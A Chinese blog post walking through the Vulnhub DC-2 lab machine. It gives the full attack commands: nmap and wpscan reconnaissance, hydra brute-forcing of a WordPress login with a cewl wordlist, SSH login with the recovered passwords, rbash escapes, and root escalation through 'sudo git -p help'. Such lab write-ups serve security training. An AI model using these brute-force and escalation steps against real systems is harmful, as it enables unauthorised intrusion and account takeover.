靶机渗透测试实战(二)——DC-2

最新推荐文章于 2024-04-13 02:45:11 发布
最新推荐文章于 2024-04-13 02:45:11 发布
阅读量5.3k 收藏 31
点赞数 10
分类专栏: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45116657/article/details/101377121
版权

实验环境

  • 靶机(DC-2),IP地址未知;
  • 测试机kali,IP地址:192.168.85.131

实验步骤

1、确定目标主机、详细信息
1.1> 主机扫描

命令:arp-scan -l ——> 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)

  • arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)。它可以构造并发送ARP请求到指定的IP地址,并且显示返回的任何响应。
  • arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。设备可以屏蔽ping,但是并不能屏蔽ARP数据包。

在这里插入图片描述

1.2> 端口扫描(nmap扫描)

命令1:nmap -sS -Pn -A -p- -n 192.168.85.137
命令2:nmap -sV -p- 192.168.85.137

在这里插入图片描述

通过nmap扫描我们发现,这个网站的管理员还是有点安全意识的,将ssh服务的端口改成了7744(ssh默认端口号是:22)。
在这里插入图片描述

【思路】
          针对扫描出的开放服务(应用程序)的处理思路:
                 1、针对版本搜索相关漏洞;
                 2、针对协议本身;
2、通过测试机kali访问目标机DC-2的web服务

(通常是解析造成的)在hosts文件添加对应的ip和域名;

2.1> 测试机kali访问DC-2的web服务;

在这里插入图片描述
可以发现直接连接不上目标机的Web网络,判断是本地不解析域名。

2.2> 在hosts文件添加对应的ip和域名

在这里插入图片描述

3、访问http://dc-2/index.php/flag/ ,确定CMS是wordpress;

WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,get CMS

【思路】
		根据CMS做进一步操作:
				1、成熟的CMS一般自身不会有漏洞,可以关注其插件的问题;
				2、尝试得知CMS版本,做进一步的漏洞搜索;
				3、搜索相关CMS的测试工具。

在这里插入图片描述

4、点开页面的flag,翻译,提示如下;

在这里插入图片描述

5、搜索cewl,发现是一个kali自带的密码生成工具;

Cewl介绍:
.
cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到John the ripper工具里进行密码破解。cewl还有一个相关的命令行工具应用FAB,它使用相同的元数据提取技术从已下载的列表中创建作者/创建者列表。

在这里插入图片描述

6、查看使用方法,使用cewl生成密码;

参考微博:https://www.4hou.com/tools/14693.html

命令:cewl -w dc2_passwords.txt http://dc-2

  • -w, –write:将输出结果写入到文件。

在这里插入图片描述

7、确定是wordpress,使用wpscan工具进行扫描用户

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。

参考链接:https://www.cnblogs.com/WangYiqiang/p/9490869.html

  • 命令1:root@kali:~# wpscan --url http://dc-2 --enumerate u
    #暴力枚举用户名(这个是资料里面的,我的卡里里面跑不了这个的!!!)

  • 命令1:wpscan --ignore-main-redirect --url 192.168.85.137 --enumerate u --force
    #这是自己花两个星期终于找到解决问题的办法了

参考文献:https://www.jianshu.com/p/a0143cc79215

在这里插入图片描述在这里插入图片描述

扫描出三个用户:admin、tom和jerry。将三个用户写入dc-2_user.txt中。

在这里插入图片描述

8、通过已经扫描到的用户名和密码对目标主机(dc-2)进行爆破

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种协议密码,并且还支持生成密码字典,有GUI图形和命令行两种非常容易上手。

命令:root@kali:~# hydra -L dc-2_user.txt -P dc2_passwords.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’

  • -l ——> 表示单个用户名(使用-L表示用户名列表)
  • -P ——> 表示使用以下密码列表
  • http-post-form ——> 表示表单的类型
  • / dvwa / login-php ——> 是登录页面URL
  • username ——> 是输入用户名的表单字段
  • ^ USER ^ ——> 告诉Hydra使用字段中的用户名或列表
  • password是输入密码的表单字段(可以是passwd,pass等)
  • ^ PASS ^ ——> 告诉Hydra使用提供的密码列表

在这里插入图片描述

或者直接使用wpscan进行密码爆破

命令:root@kali:~# wpscan --ignore-main-redirect --url 192.168.85.137 -U dc-2_user.txt -P dc2_passwords.txt --force

在这里插入图片描述
在这里插入图片描述

9、尝试ssh远程登录,最终tom成功登录

我们尝试用tom用户进行登录ssh服务,密码:parturient
用户:jerry,密码:adipiscing
命令:ssh tom@192.168.85.137 -p 7744

在这里插入图片描述

10、输入命令,发现事受限的shell命令,rbash,百度搜索rbash,发现有绕过方法,进行查找,并尝试
10.1> 输入命令,发现事受限的shell命令,为rbash;

在这里插入图片描述出现-rbash: id: command not found
参考https://www.anquanke.com/post/id/173159 里面的绕过
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

  • 有很多不同的限制外壳可供选择。其中一些只是普通的shell,有一些简单的常见限制,实际上并不是可配置的,例如rbash(限制Bash)rzsh和rksh(受限模式下的Korn Shell),这些都非常容易绕过。其他人有一个完整的配置集,可以重新设计以满足管理员的需求,如lshell(Limited Shell)和rssh(Restricted Secure Shell)。
  • 一旦配置可以被管理员收紧,可配置的shell就更难以绕过。在这些shell上绕过技术通常依赖于管理员有点被迫为普通用户提供某些不安全命令的事实。。如果在没有适当安全配置的情况下允许,它们会为攻击者提供升级权限的工具,有时还会向root用户升级。
  • 其他原因是,有时管理员只是Linux系统管理员,而不是真正的安全专业人员,因此从渗透测试人员的角度来看,他们并不真正了解部队的方式,并最终允许太多危险命令。
10.2> 绕过首先的shell;
  • 方法一:

用vi编辑器穿件shell文件
用vi的末行模式下输入 ——> :set shell=/bin/bash
然后应用这个shell ——> : shell

  • 方法二:

或者BASH_CMDS[a]=/bin/sh;a
然后 /bin/bash

在这里插入图片描述

11、使用并添加环境变量

命令1:export PATH=$PATH:/bin/

在这里插入图片描述或者

命令2:export PATH=/usr/sbin:/usr/bin:/sbin:/bin

在这里插入图片描述PATH就是定义/bin:/sbin:/usr/bin等这些路径的变量,其中冒号为目录间的分割符。

可以查看flag3.txt的内容:

在这里插入图片描述

tom@DC-2:~$ export -p
declare -x HOME="/home/tom"
declare -x LANG="en_US.UTF-8"
declare -x LOGNAME="tom"
declare -x MAIL="/var/mail/tom"
declare -x OLDPWD
declare -x PATH="/home/tom/usr/bin"
declare -x PWD="/home/tom"                                #?加入了/bin
declare -x SHELL="/bin/rbash"
declare -x SHLVL="2"
declare -x SSH_CLIENT="192.168.85.130 54586 7744"
declare -x SSH_CONNECTION="192.168.85.130 54586 192.168.85.137 7744"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="tom"
declare -x VIM="/usr/share/vim"
declare -x VIMRUNTIME="/usr/share/vim/vim74"
12、切换用户到jerry

在这里插入图片描述

13、切换到jerry,去查看Jerry目录下的文件,发现有个flag4.txt文件,并用过cat命令查看;

在这里插入图片描述

14、提示还不是最终的flag,提示git,查看sudo配置文件,发现git是root不用密码可以运行,搜索git提权在这里插入图片描述
15、进行提权,提权成功;

使用 sudo git -p help 且一页不能显示完,
在最底下面输入 !/bin/bash,
最后完成提权。

在这里插入图片描述

weixin_45116657
关注
  • 10
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
linux脚本环境,使用lshell构建受限的shell环境
weixin_29376541的博客
05-04 506
2013年我写过一篇博文《linux下自建ssh堡垒机》,其核以是通过chroot和googleAuthenticator实现的。最近在研究一些web ssh平台时,无意中注意到一个python写的类似于chroot限定shell产品lshell 。本篇就记录下该工具的安装和使用。一、lshell的安装安装非常简单,几条命令的事,如下:[root@361way srv]# git clone h...
linux控制命令使用限制,【L-shell】Linux 系统下 限制用户的活动目录,控制用户使用命令的权限。...
weixin_42416490的博客
05-01 157
1、前提:安装yum 扩展源:注:本人用的是CentOS6.5,64位系统,所以下的是这个地址。(如果是其它版本或其他情况,参考下面的地址:)centos5:32位epel源下载地址:www.lishiming.net/data/attachment/forum/epel-release-5-4_32.noarch.rpm64位下载地址:www.lishiming.net/data/attachm...
DC-2靶机详解,2024年最新2024网络安全架构面试指南
最新发布
2301_82101171的博客
04-13 328
接下来使用一个工具 WPScan,同样 kali 自带爆破结果,存在2个账户这里可以用dirb工具扫一下有哪些可以登录的页面使用账号 jerry 登录后可以发现 flag2说人话flag 提示,如果 wordpress 打不下来,就得换一个入口上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。
Vulnhub靶机渗透学习记录:DC-2
Youanddream的博客
01-25 275
目录环境搭建 环境搭建 攻击机:Kali-Linux2020.4(VmwareWorkstation) 靶机DC-2(VirtualBox) DC-2靶机下载链接:http://www.vulnhub.com/entry/dc-2,311/. 两台虚拟机配置桥接模式,并桥接到同一张网卡 ifconfig查看攻击机所在网段 nmap查看该网段存活主机 #sudo可以使nmap进行arp扫描 sudo nmap -sn 192.168.1.0/24 ...
Vulnhub DC-2靶机渗透攻击过程演练
zhongxj183的博客
01-04 2956
Vulnhub DC-2靶机渗透攻击过程演练 DC-2介绍 与DC-1相同,DC-2靶机也有5个flag,需要注意的是,要添加host才能访问DC-2的web 环境准备 下载DC-2靶机导入VMware,选择和Kali同一网络适配器,DHCP获取IP即可 渗透过程 信息收集 扫描存活主机,得到目标靶机的IP nmap -sP 192.168.64.0/24 扫描端口,初步收集信息 nmap -T4 -sC -sV 192.168.64.128 添加host,访问web测试 主页上可以看到
DC系列:2(DC-2靶机 初阶渗透详细)
jrdh的博客
11-27 2700
DC-2靶机环境搭建详情:描述使用工具一.信息收集基础信息查询0x01 查看存活主机0x02 查看开放端口0x03 查看端口服务0x04 扫描网站根目录及指纹信息.漏洞发现访问开放网页0x01解决重定向问题0x02 flag1cewl创建password字典0x03wpscan爆破用户名及密码0x04登录后台三.漏洞利用远程连接0x01ssh远程登录0x02突破rbash限制0x03添加环境变量0x04 flag3四.提权flag4总结 环境搭建 详情: 名称 DC- 2 发布日期 201
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Limited Shell (lshell)-开源
05-03
lshell是用Python编码的shell,可让您将用户的环境限制为有限的命令集,选择启用/禁用SSH上的任何命令(例如SCP,SFTP,rsync等),记录用户的命令,实施计时限制,和更多。
[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-21 1874
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
学习测试day_5
bgxeg的博客
11-29 202
#define _CRT_SECURE_NO_WARNINGS 1 #include<stdio.h> #include<string.h> #include<windows.h> #include<stdlib.h> int main() { int i = 0; char password[20] = { 0 }; printf(“请输入密码:>”); scanf("%s", password); for (i = 0; i < 3; i++)
受限的用户SHELL环境
savior141的专栏
05-06 1125
有些特殊情况下需要实现将系统内普通用户限定在指定目录下,并且只能使用系统管理员设定的命令。lshell就是实现这样功能的一个神器。 lshell提供了一个针对每个用户可配置的限制性shell,lshell的配置文件非常的简单,可以和ssh的authorized_keys或者/etc/shell、/etc/passwd耦合使用,lshell可以很容易的严格限制用户可以访问哪些命令。 项目
[渗透测试篇]Vulnhub之靶机DC-2
qq_43668710的博客
05-11 432
文章目录靶机描述实验环境渗透思路获取目标IP(netdiscover)端口扫描(nmap)生成密码(cewl)获取用户名(wpscan)暴力破解(hydra)登录后台全端口扫描/SSH登录逃脱受限shell/导入$PATHgit 提权知识总结DC-系列 靶机描述 共有五个标志,包括最终标志.任务就是跟着逐一放出的flag提示拿到最终的flag. 实验环境 攻击机:kali 目标机:DC-2 涉及工具: 'netdiscover':获取目标IP 'nmap':信息收集/端口扫描/Web服务判断 'cewl
DC-2完整的渗透测试过程
weixin_51097397的博客
07-04 502
1.此次DC-2的渗透用到了如下几种工具的基础使用①arp-scan②namp③dirsearch④cewl⑤wpscan2.学到了修改本地hosts3.学会rbash逃逸BASH_CMDS [ r ] = /bin/bash #设置变量r为一个shell r #执行这个shell #添加环境变量 export PATH = $PATH :/bin/ export PATH = $PATH :/usr/bin/4.学会git提权。
7.10. Limited command Shell (lshell)
weixin_34179968的博客
01-01 81
https://github.com/ghantoos/lshell 主要功能就是能够限制那些命令用户可以运行 原文出处:Netkiller 系列 手札 本文作者:陈景峯 转载请与作者联系,同时请务必标明文章原始出处和作者信息及本声明。 ...
DC-2靶场实战详解
热门推荐
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
Vulnhub的靶机环境可以帮助我们学习和实践渗透测试技术。 、JIS-CTF题目描述 JIS-CTF是日本信息安全竞赛,旨在提高日本信息安全技术的水平。JIS-CTF题目涵盖了网络安全、系统安全、加密安全等多个领域。 三、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值